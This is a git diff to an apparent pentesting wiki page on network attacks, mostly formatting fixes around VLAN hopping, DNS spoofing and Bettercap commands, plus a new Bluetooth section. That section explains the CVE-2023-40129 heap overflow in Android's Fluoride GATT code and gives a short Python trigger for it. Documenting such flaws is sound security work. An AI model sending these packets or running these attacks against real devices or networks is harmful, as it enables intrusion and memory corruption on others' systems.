diff --git a/src/generic-methodologies-and-resources/pentesting-network/README.md b/src/generic-methodologies-and-resources/pentesting-network/README.md
index cf9367f951f..a128c17e554 100644
--- a/src/generic-methodologies-and-resources/pentesting-network/README.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/README.md
@@ -333,7 +333,10 @@ By analyzing the STP frames, **we learn about the existence of VLAN 30 and VLAN
Once you known VLAN IDs and IPs values, you can **configure a virtual interface to attack a specific VLAN**.\
If DHCP is not available, then use _ifconfig_ to set a static IP address.
-```
+
+VLAN interface configuration (example)
+
+```bash
root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
@@ -352,6 +355,9 @@ eth1.250 Link encap:Ethernet HWaddr 00:0e:c6:f0:29:65
root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
```
+
+
+
```bash
# Another configuration example
modprobe 8021q
@@ -691,15 +697,22 @@ set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on
**Configure own DNS with dnsmasq**
```bash
-apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1 domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
+apt-get install dnsmasq
+echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
+echo "127.0.0.1 domain.example.com" > dnsmasq.hosts
+sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS
```
+
### Local Gateways
Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use _gateway-finder.py_ to identify hosts that support IPv4 forwarding.
-```
+
+gateway-finder usage example
+
+```bash
root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
@@ -717,6 +730,9 @@ gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
```
+
+
+
### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
For local host resolution when DNS lookups are unsuccessful, Microsoft systems rely on **Link-Local Multicast Name Resolution (LLMNR)** and the **NetBIOS Name Service (NBT-NS)**. Similarly, **Apple Bonjour** and **Linux zero-configuration** implementations utilize **Multicast DNS (mDNS)** for discovering systems within a network. Due to the unauthenticated nature of these protocols and their operation over UDP, broadcasting messages, they can be exploited by attackers aiming to redirect users to malicious services.
@@ -796,7 +812,7 @@ Note that in order to perform this attack the victim has to try to access initia
More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and [here](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly).
-**sslStrip or sslStrip+ doesn;t work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.**
+**sslStrip or sslStrip+ doesn't work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.**
TODO: easy-creds, evilgrade, metasploit, factory
@@ -840,6 +856,9 @@ Other things to test is to try to sign the certificate with a valid certificate
## Bettercap
+
+Common Bettercap commands
+
```bash
# Events
events.stream off #Stop showing events
@@ -866,6 +885,9 @@ set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap
```
+
+
+
### Active Discovery Notes
Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent.
@@ -897,6 +919,70 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19
Bettercap broadcast WSD packets searching for services (UDP Port 3702).
+## Bluetooth (L2CAP/ATT/GATT) Attacks
+
+- Android Fluoride exposes services over L2CAP PSMs (e.g., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Services register via:
+
+```c
+uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
+ bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
+ uint16_t my_mtu, uint16_t required_remote_mtu,
+ uint16_t sec_level);
+```
+
+- BlueBlue framework enables Scapy-based L2CAP/ATT crafting (built on BlueBorne l2cap_infra). Example:
+
+```python
+acl = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
+gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
+gatt.send_frag(p8(GATT_READ)+p16(1234))
+print(gatt.recv())
+```
+
+- CVE-2023-40129 (Fluoride GATT): integer underflow in Read Multiple Variable response builder can cause ~64KB heap overflow when MTU truncates a variable-length element but the +2 length field is not accounted for.
+
+
+Root cause (GATT Read Multiple Variable)
+
+```c
+static void build_read_multi_rsp(tGATT_SR_CMD* p_cmd, uint16_t mtu) {
+ uint16_t ii, total_len, len; uint8_t* p; bool is_overflow=false;
+ len = sizeof(BT_HDR) + L2CAP_MIN_OFFSET + mtu;
+ BT_HDR* p_buf = (BT_HDR*)osi_calloc(len); p_buf->offset=L2CAP_MIN_OFFSET;
+ p = (uint8_t*)(p_buf + 1) + p_buf->offset; *p++ = GATT_RSP_READ_MULTI_VAR;
+ p_buf->len=1;
+ for (ii=0; iimulti_req.num_handles; ii++) {
+ tGATTS_RSP* p_rsp = ...; // dequeued
+ if (p_rsp) {
+ total_len = (p_buf->len + p_rsp->attr_value.len);
+ if (p_cmd->multi_req.variable_len) total_len += 2;
+ if (total_len > mtu) {
+ len = p_rsp->attr_value.len - (total_len - mtu); // BUG: ignores +2
+ is_overflow = true;
+ } else { len = p_rsp->attr_value.len; }
+ if (p_cmd->multi_req.variable_len) { UINT16_TO_STREAM(p, len); p_buf->len += 2; }
+ memcpy(p, p_rsp->attr_value.value, len); // heap overflow
+ if (!is_overflow) p += len; p_buf->len += len; if (is_overflow) break;
+ }
+ }
+}
+```
+
+- On variable-length entries, the overflow path subtracts only (total_len - mtu), ignoring the +2 length field, so len underflows (e.g., 0xFFFE) and memcpy writes ~64KB past the end of the buffer.
+
+
+- Minimal unauthenticated trigger (small MTU forces underflow on the 4th attribute):
+
+```python
+# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55
+acl = ACLConnection(interface, bdaddr)
+gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)
+pkt = b'\x20' # opcode
+pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9)
+gatt.send(pkt)
+# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite
+```
+
### Telecom / Mobile-Core (GTP) Exploitation
@@ -910,6 +996,8 @@ telecom-network-exploitation.md
- **Network Security Assessment: Know Your Network (3rd edition)**
- **Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood**
- [https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
+- [Paint it blue: Attacking the bluetooth stack (Synacktiv)](https://www.synacktiv.com/en/publications/paint-it-blue-attacking-the-bluetooth-stack)
+- [BlueBorne L2CAP testing infra (l2cap_infra)](https://github.com/ArmisSecurity/blueborne/tree/master/l2cap_infra)